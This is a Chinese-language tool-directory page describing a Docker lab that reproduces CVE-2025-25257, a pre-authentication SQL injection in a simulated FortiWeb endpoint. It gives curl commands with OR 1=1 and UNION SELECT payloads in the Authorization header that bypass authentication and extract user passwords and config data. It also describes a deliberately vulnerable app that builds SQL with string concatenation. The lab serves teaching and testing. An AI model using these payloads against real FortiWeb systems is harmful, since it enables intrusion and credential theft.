Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-25257 — CVE-2025-25257的可复现Docker实验室,演示在模拟FortiWeb端点上通过HTTP Authorization头进行SQL注入绕过和数据外泄。 | Kitploit
工具/GitHubGitHub/lytianahkone-boop/cve-2025-25257
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育数据库安全实验室与实践
GitHublytianahkone-boop/cve-2025-25257

cve-2025-25257

CVE-2025-25257的可复现Docker实验室,演示在模拟FortiWeb端点上通过HTTP Authorization头进行SQL注入绕过和数据外泄。

查看仓库
28个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-25257 - 实验环境

实验架构(该环境模拟 FortiWeb 的易受攻击组件)

root@kitploit:~
易受攻击的端点:/api/system/fabric/config
注入向量:HTTP 头 Authorization: Bearer
机制:直接 SQL 拼接(Python f-string)
认证:无(完全绕过)
数据库:SQLite(用于演示)

cve-2025-25257

├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md

Dockerfile:刻意设计的存在漏洞的 HTTP 服务 / 暴露无需认证即可利用的 API

docker-compose.yml:编排可复现的易受攻击服务 / 通过 http 暴露可攻击的 API / 隔离实验环境

requirements.txt:确保稳定且可复现的环境

app.py:实现预认证端点 / 通过 Authorization 接受用户输入 / 将该输入拼接到 SQL 查询中 / 实现认证绕过与数据提取

init_db.py :准备一组可利用的数据集 / 可清晰演示认证绕过与数据外泄

payload.txt 提供最小、可控且可观察的代码执行证明

第 1 步:构建并启动容器

构建 Docker 镜像

docker-compose build

启动容器

docker-compose up -d

验证容器是否处于活动状态

docker-compose ps

查看日志

docker-compose logs -f

第 2 步:验证服务的可访问性

curl http://localhost:8080/api/system/status

第 3 步:漏洞利用

非恶意请求

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"

恶意 SQL 查询注入:使用 OR 1=1 绕过

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"

使用 UNION-SELECT 注入提取数据

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"

外泄敏感数据

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"

第 4 步:清理与停止

停止容器

docker-compose down

删除卷

docker-compose down -v

删除镜像

docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest

下载工具